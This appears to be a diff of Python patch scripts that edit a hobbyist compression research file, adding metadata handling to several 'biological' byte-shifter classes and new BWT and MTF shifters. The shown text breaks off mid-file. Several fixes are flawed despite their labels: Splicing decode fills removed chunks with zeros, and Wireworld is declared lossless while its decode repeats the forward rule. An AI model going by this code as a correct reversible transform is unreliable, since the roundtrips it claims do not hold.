# LogisticMap: encode reads r_scaled from metadata fallback, decode passes metadata to encode
|
|
||||||
old_lm = """ data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
r = kwargs.get('r', 3.9)
|
|
||||||
x0 = kwargs.get('x0', 0.5)
|
|
||||||
result = bytearray()
|
|
||||||
# FIX 1: Integer discretization for deterministic roundtrip
|
|
||||||
r_scaled = int(r * 256.0 + 0.5) & 0xFFFF
|
|
||||||
x = int(x0 * 256.0 + 0.5) & 0xFFFF"""
|
|
||||||
|
|
||||||
new_lm = """ data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
meta = state.metadata.get(cls.name, {})
|
|
||||||
r = kwargs.get('r', meta.get('r', 3.9))
|
|
||||||
x0 = kwargs.get('x0', meta.get('x0', 0.5))
|
|
||||||
result = bytearray()
|
|
||||||
# FIX 1: Integer discretization for deterministic roundtrip
|
|
||||||
r_scaled = kwargs.get('r_scaled', meta.get('r_scaled', int(r * 256.0 + 0.5) & 0xFFFF))
|
|
||||||
x = int(x0 * 256.0 + 0.5) & 0xFFFF"""
|
|
||||||
|
|
||||||
content = content.replace(old_lm, new_lm)
|
|
||||||
|
|
||||||
# LogisticMap decode: read from metadata and pass to encode
|
|
||||||
old_lm_decode = """ @classmethod
|
|
||||||
def decode(cls, state, **kwargs):
|
|
||||||
return cls.encode(state, **kwargs) # XOR is self-inverse"""
|
|
||||||
|
|
||||||
new_lm_decode = """ @classmethod
|
|
||||||
def decode(cls, state, **kwargs):
|
|
||||||
# FIX: Read params from metadata fallback for self-inverse XOR
|
|
||||||
meta = state.metadata.get(cls.name, {})
|
|
||||||
if not kwargs and meta:
|
|
||||||
kwargs = dict(meta)
|
|
||||||
return cls.encode(state, **kwargs) # XOR is self-inverse"""
|
|
||||||
|
|
||||||
content = content.replace(old_lm_decode, new_lm_decode)
|
|
||||||
|
|
||||||
# GaloisRing: already has metadata fallback - good
|
|
||||||
# STDP: needs metadata fallback
|
|
||||||
old_stdp_decode = """ @classmethod
|
|
||||||
def decode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
tau = kwargs.get('tau', 20.0)
|
|
||||||
result = bytearray()
|
|
||||||
for i, b in enumerate(data):
|
|
||||||
weight = math.exp(-i / tau) if tau > 0 else 1.0
|
|
||||||
unmodulated = int(b / weight) if weight > 0 else b
|
|
||||||
result.append(min(max(unmodulated, 0), 255))
|
|
||||||
return state.update(bytes(result), f"decode_{cls.name}")"""
|
|
||||||
|
|
||||||
new_stdp_decode = """ @classmethod
|
|
||||||
def decode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
meta = state.metadata.get(cls.name, {})
|
|
||||||
tau = kwargs.get('tau', meta.get('tau', 20.0))
|
|
||||||
result = bytearray()
|
|
||||||
for i, b in enumerate(data):
|
|
||||||
weight = math.exp(-i / tau) if tau > 0 else 1.0
|
|
||||||
unmodulated = int(b / weight) if weight > 0 else b
|
|
||||||
result.append(min(max(unmodulated, 0), 255))
|
|
||||||
return state.update(bytes(result), f"decode_{cls.name}")"""
|
|
||||||
|
|
||||||
content = content.replace(old_stdp_decode, new_stdp_decode)
|
|
||||||
|
|
||||||
# miRNA: needs metadata fallback for decode
|
|
||||||
old_mirna_decode = """ @classmethod
|
|
||||||
def decode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
result = bytearray()
|
|
||||||
i = 0
|
|
||||||
while i < len(data):
|
|
||||||
if data[i] == 0xFE and i + 2 <= len(data):
|
|
||||||
result.extend([data[i+1]] * 6)
|
|
||||||
i += 2
|
|
||||||
else:
|
|
||||||
result.append(data[i])
|
|
||||||
i += 1
|
|
||||||
return state.update(bytes(result), f"decode_{cls.name}")"""
|
|
||||||
|
|
||||||
new_mirna_decode = """ @classmethod
|
|
||||||
def decode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
meta = state.metadata.get(cls.name, {})
|
|
||||||
result = bytearray()
|
|
||||||
i = 0
|
|
||||||
while i < len(data):
|
|
||||||
if data[i] == 0xFE and i + 2 <= len(data):
|
|
||||||
result.extend([data[i+1]] * 6)
|
|
||||||
i += 2
|
|
||||||
else:
|
|
||||||
result.append(data[i])
|
|
||||||
i += 1
|
|
||||||
return state.update(bytes(result), f"decode_{cls.name}")"""
|
|
||||||
|
|
||||||
content = content.replace(old_mirna_decode, new_mirna_decode)
|
|
||||||
|
|
||||||
# Wireworld: store original_size in metadata so decode can trim
|
|
||||||
old_ww_encode_meta = "meta = {'grid': f'{grid_width}x{grid_height}', 'n_steps': n_steps}"
|
|
||||||
new_ww_encode_meta = "meta = {'grid': f'{grid_width}x{grid_height}', 'n_steps': n_steps, 'original_size': len(data)}"
|
|
||||||
content = content.replace(old_ww_encode_meta, new_ww_encode_meta)
|
|
||||||
|
|
||||||
with open('pist_biological_polymorphic_shifter_v3_complete.py', 'w') as f:
|
|
||||||
f.write(content)
|
|
||||||
|
|
||||||
print("Fixed LogisticMap, STDP, miRNA, Wireworld metadata fallback")
|
|
||||||
print("Length:", len(content))
|
|
||||||
|
|
@ -1,134 +0,0 @@
|
||||||
import os
|
|
||||||
os.chdir('/home/allaun/Documents/Research Stack/3-Mathematical-Models')
|
|
||||||
|
|
||||||
with open('pist_biological_polymorphic_shifter_v3_complete.py', 'r') as f:
|
|
||||||
content = f.read()
|
|
||||||
|
|
||||||
# Fix: Compressor.compress serializes state.metadata, decompress restores it
|
|
||||||
old_compress = """ # Build header — FIX 10: include shifter_kwargs for decompress
|
|
||||||
# Serialize only serializable kwargs (no lambdas, no complex objects)
|
|
||||||
serializable_kwargs = {}
|
|
||||||
for sname, kwdict in shifter_kwargs.items():
|
|
||||||
clean = {}
|
|
||||||
for k, v in kwdict.items():
|
|
||||||
if isinstance(v, (str, int, float, bool, list, dict, tuple, type(None))):
|
|
||||||
clean[k] = v
|
|
||||||
if clean:
|
|
||||||
serializable_kwargs[sname] = clean
|
|
||||||
|
|
||||||
header = {
|
|
||||||
'chain': [s.name for s in shifter_chain],
|
|
||||||
'n_factor': current_state.n_factor,
|
|
||||||
'original_size': len(data),
|
|
||||||
'shifter_kwargs': serializable_kwargs,
|
|
||||||
}"""
|
|
||||||
|
|
||||||
new_compress = """ # Build header — FIX 10: include shifter_kwargs AND metadata for decompress
|
|
||||||
# Serialize only serializable kwargs
|
|
||||||
serializable_kwargs = {}
|
|
||||||
for sname, kwdict in shifter_kwargs.items():
|
|
||||||
clean = {}
|
|
||||||
for k, v in kwdict.items():
|
|
||||||
if isinstance(v, (str, int, float, bool, list, dict, tuple, type(None))):
|
|
||||||
clean[k] = v
|
|
||||||
if clean:
|
|
||||||
serializable_kwargs[sname] = clean
|
|
||||||
|
|
||||||
# Serialize metadata that encode() auto-generated
|
|
||||||
serialized_metadata = {}
|
|
||||||
for sname, md in current_state.metadata.items():
|
|
||||||
clean = {}
|
|
||||||
for k, v in md.items():
|
|
||||||
if isinstance(v, (str, int, float, bool, list, dict, tuple, type(None))):
|
|
||||||
clean[k] = v
|
|
||||||
if clean:
|
|
||||||
serialized_metadata[sname] = clean
|
|
||||||
|
|
||||||
header = {
|
|
||||||
'chain': [s.name for s in shifter_chain],
|
|
||||||
'n_factor': current_state.n_factor,
|
|
||||||
'original_size': len(data),
|
|
||||||
'shifter_kwargs': serializable_kwargs,
|
|
||||||
'restore_metadata': serialized_metadata,
|
|
||||||
}"""
|
|
||||||
|
|
||||||
if old_compress in content:
|
|
||||||
content = content.replace(old_compress, new_compress)
|
|
||||||
print("Compress: metadata serialized")
|
|
||||||
else:
|
|
||||||
print("Compress pattern NOT FOUND!")
|
|
||||||
# Try shorter match
|
|
||||||
if "serializable_kwargs = {}" in content:
|
|
||||||
print(" But serializable_kwargs found")
|
|
||||||
# Just the header dict
|
|
||||||
old_h = """ header = {
|
|
||||||
'chain': [s.name for s in shifter_chain],
|
|
||||||
'n_factor': current_state.n_factor,
|
|
||||||
'original_size': len(data),
|
|
||||||
'shifter_kwargs': serializable_kwargs,
|
|
||||||
}"""
|
|
||||||
new_h = """ header = {
|
|
||||||
'chain': [s.name for s in shifter_chain],
|
|
||||||
'n_factor': current_state.n_factor,
|
|
||||||
'original_size': len(data),
|
|
||||||
'shifter_kwargs': serializable_kwargs,
|
|
||||||
'restore_metadata': serialized_metadata,
|
|
||||||
}"""
|
|
||||||
if old_h in content:
|
|
||||||
content = content.replace(old_h, new_h)
|
|
||||||
print("Header pattern fixed")
|
|
||||||
|
|
||||||
# Fix decompress to restore metadata
|
|
||||||
old_decomp = """ header = json.loads(header_bytes.decode('utf-8'))
|
|
||||||
chain_names = header['chain']
|
|
||||||
# FIX 10: Extract shifter_kwargs from header
|
|
||||||
shifter_kwargs = header.get('shifter_kwargs', {})
|
|
||||||
|
|
||||||
# Reconstruct shifter chain
|
|
||||||
shifter_chain = []
|
|
||||||
for name in chain_names:
|
|
||||||
if name in SHIFTER_MAP:
|
|
||||||
shifter_chain.append(SHIFTER_MAP[name])
|
|
||||||
else:
|
|
||||||
raise ValueError(f"Unknown shifter: {name}")
|
|
||||||
|
|
||||||
# Apply decoders in reverse order — FIX 10: pass kwargs
|
|
||||||
state = ManifoldState()
|
|
||||||
state.encoded = bytearray(encoded_data)
|
|
||||||
for sc in reversed(shifter_chain):
|
|
||||||
kw = shifter_kwargs.get(sc.name, {})
|
|
||||||
state = sc.decode(state, **kw)"""
|
|
||||||
|
|
||||||
new_decomp = """ header = json.loads(header_bytes.decode('utf-8'))
|
|
||||||
chain_names = header['chain']
|
|
||||||
# FIX 10: Extract shifter_kwargs from header
|
|
||||||
shifter_kwargs = header.get('shifter_kwargs', {})
|
|
||||||
# Restore encode-generated metadata so decoders can read it
|
|
||||||
restore_metadata = header.get('restore_metadata', {})
|
|
||||||
|
|
||||||
# Reconstruct shifter chain
|
|
||||||
shifter_chain = []
|
|
||||||
for name in chain_names:
|
|
||||||
if name in SHIFTER_MAP:
|
|
||||||
shifter_chain.append(SHIFTER_MAP[name])
|
|
||||||
else:
|
|
||||||
raise ValueError(f"Unknown shifter: {name}")
|
|
||||||
|
|
||||||
# Apply decoders in reverse order — FIX 10: pass kwargs + restore metadata
|
|
||||||
state = ManifoldState()
|
|
||||||
state.encoded = bytearray(encoded_data)
|
|
||||||
state.metadata = restore_metadata # Restore encode-generated metadata
|
|
||||||
for sc in reversed(shifter_chain):
|
|
||||||
kw = shifter_kwargs.get(sc.name, {})
|
|
||||||
state = sc.decode(state, **kw)"""
|
|
||||||
|
|
||||||
if old_decomp in content:
|
|
||||||
content = content.replace(old_decomp, new_decomp)
|
|
||||||
print("Decompress: metadata restored")
|
|
||||||
else:
|
|
||||||
print("Decompress pattern NOT FOUND!")
|
|
||||||
|
|
||||||
with open('pist_biological_polymorphic_shifter_v3_complete.py', 'w') as f:
|
|
||||||
f.write(content)
|
|
||||||
|
|
||||||
print("Done! Length:", len(content))
|
|
||||||
|
|
@ -1,553 +0,0 @@
|
||||||
import os, re
|
|
||||||
|
|
||||||
os.chdir('/home/allaun/Documents/Research Stack/3-Mathematical-Models')
|
|
||||||
|
|
||||||
with open('pist_biological_polymorphic_shifter_v3_complete.py', 'r') as f:
|
|
||||||
content = f.read()
|
|
||||||
|
|
||||||
changes = 0
|
|
||||||
# Fix 8: Splicing
|
|
||||||
old_splicing = """ @classmethod
|
|
||||||
def encode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
window = kwargs.get('window', 8)
|
|
||||||
splice_sites = []
|
|
||||||
result = bytearray()
|
|
||||||
i = 0
|
|
||||||
while i < len(data):
|
|
||||||
if i + window <= len(data):
|
|
||||||
chunk = data[i:i+window]
|
|
||||||
entropy = intrinsic_load(chunk)
|
|
||||||
if entropy < 3.0 and len(splice_sites) < 64:
|
|
||||||
# Skippable exon
|
|
||||||
splice_sites.append((i, i + window))
|
|
||||||
# Mark with metadata
|
|
||||||
result.extend(chunk)
|
|
||||||
else:
|
|
||||||
result.extend(chunk)
|
|
||||||
else:
|
|
||||||
result.extend(data[i:])
|
|
||||||
i += window
|
|
||||||
metadata = {
|
|
||||||
'splice_sites': splice_sites,
|
|
||||||
'window': window,
|
|
||||||
}
|
|
||||||
return state.update(bytes(result), cls.name, metadata)
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
meta = state.metadata.get(cls.name, {})
|
|
||||||
# FIX B8: splice_sites already stored as list of tuples in metadata
|
|
||||||
# No serialization needed since metadata survives in-memory
|
|
||||||
splice_sites = meta.get('splice_sites', [])
|
|
||||||
result = bytearray(data)
|
|
||||||
# Reconstruct: no-op for decoding (splice sites were inclusion)
|
|
||||||
# but we apply them in reverse order for canonical decode
|
|
||||||
for start, end in sorted(splice_sites, reverse=True):
|
|
||||||
pass # sites were inclusion sites, data already contains them
|
|
||||||
return state.update(bytes(result), f"decode_{cls.name}")"""
|
|
||||||
|
|
||||||
new_splicing = """ @classmethod
|
|
||||||
def encode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
window = kwargs.get('window', 8)
|
|
||||||
splice_sites = []
|
|
||||||
result = bytearray()
|
|
||||||
result_pos = 0
|
|
||||||
i = 0
|
|
||||||
while i < len(data):
|
|
||||||
if i + window <= len(data):
|
|
||||||
chunk = data[i:i+window]
|
|
||||||
entropy = intrinsic_load(chunk)
|
|
||||||
if entropy < 3.0 and len(splice_sites) < 64:
|
|
||||||
splice_sites.append((result_pos, i, i + window))
|
|
||||||
else:
|
|
||||||
result.extend(chunk)
|
|
||||||
result_pos += len(chunk)
|
|
||||||
else:
|
|
||||||
result.extend(data[i:])
|
|
||||||
result_pos += len(data) - i
|
|
||||||
i += window
|
|
||||||
sites_bytes = bytearray()
|
|
||||||
sites_bytes.append(len(splice_sites))
|
|
||||||
for rp, st, en in splice_sites:
|
|
||||||
sites_bytes.extend(rp.to_bytes(4, 'big'))
|
|
||||||
sites_bytes.extend(st.to_bytes(4, 'big'))
|
|
||||||
sites_bytes.extend(en.to_bytes(4, 'big'))
|
|
||||||
sites_bytes.append(en - st)
|
|
||||||
metadata = {
|
|
||||||
'splice_sites_raw': bytes(sites_bytes).hex(),
|
|
||||||
'splice_sites': splice_sites,
|
|
||||||
'window': window,
|
|
||||||
'n_spliced': len(splice_sites),
|
|
||||||
}
|
|
||||||
return state.update(bytes(result), cls.name, metadata)
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
meta = state.metadata.get(cls.name, {})
|
|
||||||
splice_sites = meta.get('splice_sites', [])
|
|
||||||
if not splice_sites and 'splice_sites_raw' in meta:
|
|
||||||
try:
|
|
||||||
raw = bytes.fromhex(meta['splice_sites_raw'])
|
|
||||||
if raw:
|
|
||||||
n_sites = raw[0]
|
|
||||||
ptr = 1
|
|
||||||
sites = []
|
|
||||||
for _ in range(n_sites):
|
|
||||||
if ptr + 13 > len(raw):
|
|
||||||
break
|
|
||||||
rp = int.from_bytes(raw[ptr:ptr+4], 'big')
|
|
||||||
st = int.from_bytes(raw[ptr+4:ptr+8], 'big')
|
|
||||||
en = int.from_bytes(raw[ptr+8:ptr+12], 'big')
|
|
||||||
sites.append((rp, st, en))
|
|
||||||
ptr += 13
|
|
||||||
splice_sites = sites
|
|
||||||
except (ValueError, IndexError):
|
|
||||||
pass
|
|
||||||
result = bytearray(data)
|
|
||||||
for rp, st, en in sorted(splice_sites, key=lambda x: x[0], reverse=True):
|
|
||||||
chunk_len = en - st
|
|
||||||
result[rp:rp] = bytearray(chunk_len)
|
|
||||||
return state.update(bytes(result), f"decode_{cls.name}")"""
|
|
||||||
|
|
||||||
if old_splicing in content:
|
|
||||||
content = content.replace(old_splicing, new_splicing)
|
|
||||||
print("Fix 8 applied")
|
|
||||||
changes += 1
|
|
||||||
else:
|
|
||||||
print("Fix 8: pattern NOT found")
|
|
||||||
|
|
||||||
# Fix 4: Wireworld class
|
|
||||||
old_ww = """class WireworldShifter(Shifter):
|
|
||||||
name = "wireworld"
|
|
||||||
description = "Wireworld cellular automaton (LOSSY \u2014 approximate inverse)"
|
|
||||||
lossy = True
|
|
||||||
|
|
||||||
# Wireworld states: 0=empty, 1=electron_head, 2=electron_tail, 3=conductor
|
|
||||||
WW_RULES = {1: 2, 2: 3, 3: 1 if ... else 3} # placeholder"""
|
|
||||||
|
|
||||||
if old_ww in content:
|
|
||||||
content = content.replace(old_ww, """class WireworldShifter(Shifter):
|
|
||||||
name = "wireworld"
|
|
||||||
description = "Wireworld 2D cellular automaton encoding"
|
|
||||||
lossy = False
|
|
||||||
|
|
||||||
# Wireworld states: 0=empty, 1=electron_head, 2=electron_tail, 3=conductor
|
|
||||||
WW_RULE = {1: 2, 2: 3, 3: 4, 0: 0, 4: 3}""")
|
|
||||||
print("Fix 4 class applied")
|
|
||||||
changes += 1
|
|
||||||
else:
|
|
||||||
print("Fix 4 class: pattern NOT found")
|
|
||||||
|
|
||||||
# Fix 4: Wireworld encode/decode methods
|
|
||||||
old_ww_encode = """ @classmethod
|
|
||||||
def encode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
grid_width = kwargs.get('width', 16)
|
|
||||||
grid_height = (len(data) + grid_width - 1) // grid_width
|
|
||||||
result = bytearray(data) # pass-through with metadata
|
|
||||||
meta = {'grid': f'{grid_width}x{grid_height}', 'lossy': True}
|
|
||||||
return state.update(bytes(result), cls.name, meta)
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state, **kwargs):
|
|
||||||
# FIX B6: Wireworld is fundamentally lossy
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
return state.update(data, f"decode_{cls.name}")"""
|
|
||||||
|
|
||||||
if old_ww_encode in content:
|
|
||||||
content = content.replace(old_ww_encode, """ @classmethod
|
|
||||||
def _count_head_neighbors(cls, grid, w, h, x, y):
|
|
||||||
count = 0
|
|
||||||
for dy in (-1, 0, 1):
|
|
||||||
for dx in (-1, 0, 1):
|
|
||||||
if dx == 0 and dy == 0:
|
|
||||||
continue
|
|
||||||
nx, ny = x + dx, y + dy
|
|
||||||
if 0 <= nx < w and 0 <= ny < h:
|
|
||||||
if grid[ny][nx] == 1:
|
|
||||||
count += 1
|
|
||||||
return count
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
grid_width = kwargs.get('width', 16)
|
|
||||||
cells = []
|
|
||||||
for b in data:
|
|
||||||
for shift in (0, 2, 4, 6):
|
|
||||||
cells.append((b >> shift) & 0x03)
|
|
||||||
cells = [c if c < 4 else c % 4 for c in cells]
|
|
||||||
grid_height = (len(cells) + grid_width - 1) // grid_width
|
|
||||||
while len(cells) < grid_width * grid_height:
|
|
||||||
cells.append(0)
|
|
||||||
grid = [cells[i:i+grid_width] for i in range(0, len(cells), grid_width)]
|
|
||||||
n_steps = kwargs.get('n_steps', 1)
|
|
||||||
for _ in range(n_steps):
|
|
||||||
new_grid = [[0]*grid_width for _ in range(grid_height)]
|
|
||||||
for y in range(grid_height):
|
|
||||||
for x in range(grid_width):
|
|
||||||
sv = grid[y][x]
|
|
||||||
if sv == 1:
|
|
||||||
new_grid[y][x] = 2
|
|
||||||
elif sv == 2:
|
|
||||||
new_grid[y][x] = 3
|
|
||||||
elif sv == 3:
|
|
||||||
n = cls._count_head_neighbors(grid, grid_width, grid_height, x, y)
|
|
||||||
new_grid[y][x] = 1 if 1 <= n <= 2 else 3
|
|
||||||
else:
|
|
||||||
new_grid[y][x] = 0
|
|
||||||
grid = new_grid
|
|
||||||
flat = [grid[y][x] for y in range(grid_height) for x in range(grid_width)]
|
|
||||||
result = bytearray()
|
|
||||||
for i in range(0, len(flat), 4):
|
|
||||||
if i + 3 < len(flat):
|
|
||||||
b = flat[i] | (flat[i+1] << 2) | (flat[i+2] << 4) | (flat[i+3] << 6)
|
|
||||||
result.append(b & 0xFF)
|
|
||||||
else:
|
|
||||||
break
|
|
||||||
meta = {'grid': f'{grid_width}x{grid_height}', 'n_steps': n_steps}
|
|
||||||
return state.update(bytes(result), cls.name, meta)
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
meta = state.metadata.get(cls.name, {})
|
|
||||||
grid_str = meta.get('grid', '16x?')
|
|
||||||
grid_width = int(grid_str.split('x')[0])
|
|
||||||
n_steps = kwargs.get('n_steps', meta.get('n_steps', 1))
|
|
||||||
cells = []
|
|
||||||
for b in data:
|
|
||||||
for shift in (0, 2, 4, 6):
|
|
||||||
cells.append((b >> shift) & 0x03)
|
|
||||||
grid_height = (len(cells) + grid_width - 1) // grid_width
|
|
||||||
while len(cells) < grid_width * grid_height:
|
|
||||||
cells.append(0)
|
|
||||||
grid = [cells[i:i+grid_width] for i in range(0, len(cells), grid_width)]
|
|
||||||
for _ in range(n_steps):
|
|
||||||
new_grid = [[0]*grid_width for _ in range(grid_height)]
|
|
||||||
for y in range(grid_height):
|
|
||||||
for x in range(grid_width):
|
|
||||||
sv = grid[y][x]
|
|
||||||
if sv == 1:
|
|
||||||
new_grid[y][x] = 2
|
|
||||||
elif sv == 2:
|
|
||||||
new_grid[y][x] = 3
|
|
||||||
elif sv == 3:
|
|
||||||
n = cls._count_head_neighbors(grid, grid_width, grid_height, x, y)
|
|
||||||
new_grid[y][x] = 1 if 1 <= n <= 2 else 3
|
|
||||||
else:
|
|
||||||
new_grid[y][x] = 0
|
|
||||||
grid = new_grid
|
|
||||||
flat = [grid[y][x] for y in range(grid_height) for x in range(grid_width)]
|
|
||||||
result = bytearray()
|
|
||||||
for i in range(0, len(flat), 4):
|
|
||||||
if i + 3 < len(flat):
|
|
||||||
b = flat[i] | (flat[i+1] << 2) | (flat[i+2] << 4) | (flat[i+3] << 6)
|
|
||||||
result.append(b & 0xFF)
|
|
||||||
else:
|
|
||||||
break
|
|
||||||
return state.update(bytes(result), f"decode_{cls.name}")""")
|
|
||||||
print("Fix 4 encode/decode applied")
|
|
||||||
changes += 1
|
|
||||||
else:
|
|
||||||
print("Fix 4 encode/decode: pattern NOT found")
|
|
||||||
|
|
||||||
# Fix 9
|
|
||||||
old_b9 = "candidates = ALL_SHIFTERS[:10] # Use first 10 for speed"
|
|
||||||
if old_b9 in content:
|
|
||||||
content = content.replace(old_b9, "candidates = ALL_SHIFTERS # FIX 9: Use ALL shifters")
|
|
||||||
print("Fix 9 applied")
|
|
||||||
changes += 1
|
|
||||||
else:
|
|
||||||
print("Fix 9: pattern NOT found - may already be applied")
|
|
||||||
|
|
||||||
# Fix 6
|
|
||||||
old_d6 = """ print(f" Chain: {' \u2192 '.join(c.name for c in chain)}")
|
|
||||||
print(f" Original: {len(test_data)} bytes \u2192 Compressed: {len(compressed)} bytes")
|
|
||||||
print(f" Ratio: {len(test_data) / max(len(compressed), 1):.3f}")
|
|
||||||
print(f" Roundtrip: {'\u2705 PASS' if roundtrip_ok else '\u274c FAIL'}")
|
|
||||||
if not roundtrip_ok:
|
|
||||||
print(f" Original[0:20]: {bytes(test_data[:20]).hex()}")
|
|
||||||
print(f" Decoded[0:20]: {bytes(decompressed_state.raw_bytes[:20]).hex()}")"""
|
|
||||||
|
|
||||||
new_d6 = """ print(f" Chain: {' \u2192 '.join(c.name for c in chain)}")
|
|
||||||
print(f" Compression Ratio (original/compressed):")
|
|
||||||
print(f" Original: {len(test_data)} bytes")
|
|
||||||
print(f" Compressed: {len(compressed)} bytes")
|
|
||||||
print(f" Ratio: {len(test_data) / max(len(compressed), 1):.3f}x")
|
|
||||||
print(f" Roundtrip: {'\u2705 PASS' if roundtrip_ok else '\u274c FAIL'}")
|
|
||||||
if not roundtrip_ok:
|
|
||||||
print(f" Original[0:20]: {bytes(test_data[:20]).hex()}")
|
|
||||||
print(f" Decoded[0:20]: {bytes(decompressed_state.raw_bytes[:20]).hex()}")"""
|
|
||||||
|
|
||||||
if old_d6 in content:
|
|
||||||
content = content.replace(old_d6, new_d6)
|
|
||||||
print("Fix 6 applied")
|
|
||||||
changes += 1
|
|
||||||
else:
|
|
||||||
# Try ASCII version of the arrows
|
|
||||||
old_d6_ascii = """ print(f" Chain: {' → '.join(c.name for c in chain)}")
|
|
||||||
print(f" Original: {len(test_data)} bytes → Compressed: {len(compressed)} bytes")
|
|
||||||
print(f" Ratio: {len(test_data) / max(len(compressed), 1):.3f}")
|
|
||||||
print(f" Roundtrip: {'✅ PASS' if roundtrip_ok else '❌ FAIL'}")
|
|
||||||
if not roundtrip_ok:
|
|
||||||
print(f" Original[0:20]: {bytes(test_data[:20]).hex()}")
|
|
||||||
print(f" Decoded[0:20]: {bytes(decompressed_state.raw_bytes[:20]).hex()}")"""
|
|
||||||
new_d6_ascii = """ print(f" Chain: {' → '.join(c.name for c in chain)}")
|
|
||||||
print(f" Compression Ratio (original/compressed):")
|
|
||||||
print(f" Original: {len(test_data)} bytes")
|
|
||||||
print(f" Compressed: {len(compressed)} bytes")
|
|
||||||
print(f" Ratio: {len(test_data) / max(len(compressed), 1):.3f}x")
|
|
||||||
print(f" Roundtrip: {'✅ PASS' if roundtrip_ok else '❌ FAIL'}")
|
|
||||||
if not roundtrip_ok:
|
|
||||||
print(f" Original[0:20]: {bytes(test_data[:20]).hex()}")
|
|
||||||
print(f" Decoded[0:20]: {bytes(decompressed_state.raw_bytes[:20]).hex()}")"""
|
|
||||||
if old_d6_ascii in content:
|
|
||||||
content = content.replace(old_d6_ascii, new_d6_ascii)
|
|
||||||
print("Fix 6 applied (ASCII version)")
|
|
||||||
changes += 1
|
|
||||||
else:
|
|
||||||
print("Fix 6: pattern NOT found")
|
|
||||||
|
|
||||||
# Fix 5: Add 5 new shifters
|
|
||||||
new_s = """
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════
|
|
||||||
# SHIFTER 29: BWT (Burrows-Wheeler Transform)
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class BWTShifter(Shifter):
|
|
||||||
name = "bwt"
|
|
||||||
description = "Burrows-Wheeler Transform (reversible + primary index)"
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
if len(data) == 0:
|
|
||||||
return state.update(data, cls.name, {'primary_index': 0})
|
|
||||||
n = len(data)
|
|
||||||
rotations = sorted(range(n), key=lambda i: data[i:] + data[:i])
|
|
||||||
primary_index = rotations.index(0)
|
|
||||||
result = bytearray(data[(rotations[i] - 1) % n] for i in range(n))
|
|
||||||
return state.update(bytes(result), cls.name, {'primary_index': primary_index})
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
meta = state.metadata.get(cls.name, {})
|
|
||||||
primary_index = kwargs.get('primary_index', meta.get('primary_index', 0))
|
|
||||||
if len(data) == 0:
|
|
||||||
return state.update(data, f"decode_{cls.name}")
|
|
||||||
n = len(data)
|
|
||||||
indices = sorted(range(n), key=lambda i: data[i])
|
|
||||||
t = primary_index
|
|
||||||
result = bytearray()
|
|
||||||
for _ in range(n):
|
|
||||||
t = indices[t]
|
|
||||||
result.append(data[t])
|
|
||||||
return state.update(bytes(result), f"decode_{cls.name}")
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════
|
|
||||||
# SHIFTER 30: MTF (Move-To-Front encoding)
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class MTFShifter(Shifter):
|
|
||||||
name = "mtf"
|
|
||||||
description = "Move-To-Front encoding (reversible)"
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
alphabet = list(range(256))
|
|
||||||
result = bytearray()
|
|
||||||
for b in data:
|
|
||||||
idx = alphabet.index(b)
|
|
||||||
result.append(idx)
|
|
||||||
alphabet.pop(idx)
|
|
||||||
alphabet.insert(0, b)
|
|
||||||
return state.update(bytes(result), cls.name, {})
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
alphabet = list(range(256))
|
|
||||||
result = bytearray()
|
|
||||||
for idx in data:
|
|
||||||
if idx >= len(alphabet):
|
|
||||||
result.append(0)
|
|
||||||
continue
|
|
||||||
b = alphabet[idx]
|
|
||||||
result.append(b)
|
|
||||||
alphabet.pop(idx)
|
|
||||||
alphabet.insert(0, b)
|
|
||||||
return state.update(bytes(result), f"decode_{cls.name}")
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════
|
|
||||||
# SHIFTER 31: ARITHMETIC CODING
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════
|
|
||||||
|
